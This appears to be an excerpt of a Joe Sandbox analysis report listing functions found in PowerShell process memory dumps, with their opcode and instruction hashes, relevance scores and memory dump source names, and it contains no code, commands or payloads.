                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cba14cd7aae72188e484ba7df17291dbf08c43147f91891c270c640200afeeb7
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 06d5c1992d6e1e1743933aba7934f61a904a7d7370f2d59c270c435089f52c0f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cba14cd7aae72188e484ba7df17291dbf08c43147f91891c270c640200afeeb7
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9391B66B90D7C29BE753462858F60E62FE4EF13324B8D10B7D684D60A3DE0E1817E726
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FD565 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6af9607f3f1afc1b5245fac95d4c81a3d5b86ff53efce676df8e727bf5df0eea
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 26fbae1addfe4312cbfc43c7402d689768590ee9762a50fb00b6d06e50c13720
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6af9607f3f1afc1b5245fac95d4c81a3d5b86ff53efce676df8e727bf5df0eea
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7961DD5BB1DBD65BE312562D6CB61DA3FA0EF5326474900B7C385D6093ED0F3407A292
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FFFFA Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ffe20ddb00c0445042e2977fe90b8262dc61f52c67a27c49ce30a373ee3a8897
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d2ee917d07e629caf645e025912cf5abfa75b504225a8dbb03d3809824c21cbd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffe20ddb00c0445042e2977fe90b8262dc61f52c67a27c49ce30a373ee3a8897
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3516017B4D6D21AE763B76C78F20EA3FA4DF4322970902B7C6D5CA093ED1C644B9252
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F7358 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ea8c2645c8b6e1b4bac98832f1b0cfac8540708035718bb6462ad7bff42c6b8e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c220dc9a55cd0864cc2f520b34bf41e321ee59eb0fb5f716bf4815a53f5e8656
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea8c2645c8b6e1b4bac98832f1b0cfac8540708035718bb6462ad7bff42c6b8e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8518907B0DBD25BE323567C68F60E67FA4DF8327574941B3D684DA0A3DD0E244B9262
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F3379 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61667efd0a8fcac56b9dade6a08a4779f0bf4c058a8cef04cda853e51633f2ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bee76958da63b699e0b3d7b016ebfd70b2682e308207d74c040834218d9f2d6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61667efd0a8fcac56b9dade6a08a4779f0bf4c058a8cef04cda853e51633f2ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251825B90E3C65FE723A37858B15E27FA49E1322871E01F7C1D4CA093ED0D194AD3A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430E902 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 63e60de4ac7c558de2c4e0cfd34def0623389e445791221c12d8fedd521091c6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f245fb8810cb867301039f919d032b45d823ae2a88be308b37035b7670edfb2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e60de4ac7c558de2c4e0cfd34def0623389e445791221c12d8fedd521091c6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE512A16A4F7D21EE7636BB868B60D63FB4AE5322470D02F7C6C5CB093D91D180AD362
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD343045FB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 906d694787ec9cdad3ed7d2e3ec2f86e7dd1289a90a34f3c87014251428b4ee6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e2c76f5ae2764a8b9df952535fbb79b2e417373e9de50f680e7866d5259fb7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906d694787ec9cdad3ed7d2e3ec2f86e7dd1289a90a34f3c87014251428b4ee6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C31E947B4D7D21EF652632C18FA0E63F94DF2322970A02F3C685C7093AD1E2D07A692
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342FC1CD Relevance: 5.4, Strings: 4, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: PBV4$PBV4$bL_L$uV4
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-800775151
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4b24462ad456aa2d9222ca54a34199a975257298795ee093b14fd02bbc99847f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 87f11371832ba9883b8df465183a517309dffe99f8d609f244275824ab699459
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b24462ad456aa2d9222ca54a34199a975257298795ee093b14fd02bbc99847f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAD1E635A08A4D8FDF95DF5CC8A0AA97BE1FF99310F54416AE04DE7296CA39EC41C780
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD34591FDA Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536345121.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID: h8"w$p8"w$x8"w$x8"w
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1588572429
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d5c915bb8600a3f3a960ad69bf946e6fef51a4f3c080679119c993741a0f1d9
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1c35c032600506654428f97628888cb5f86660a1afb3234857e1e9a86969373
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5c915bb8600a3f3a960ad69bf946e6fef51a4f3c080679119c993741a0f1d9
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02517E3160CE099FDF99EE28C455D65B3E1FBA9311B14459DE44ACB2A2DE30FC85CB82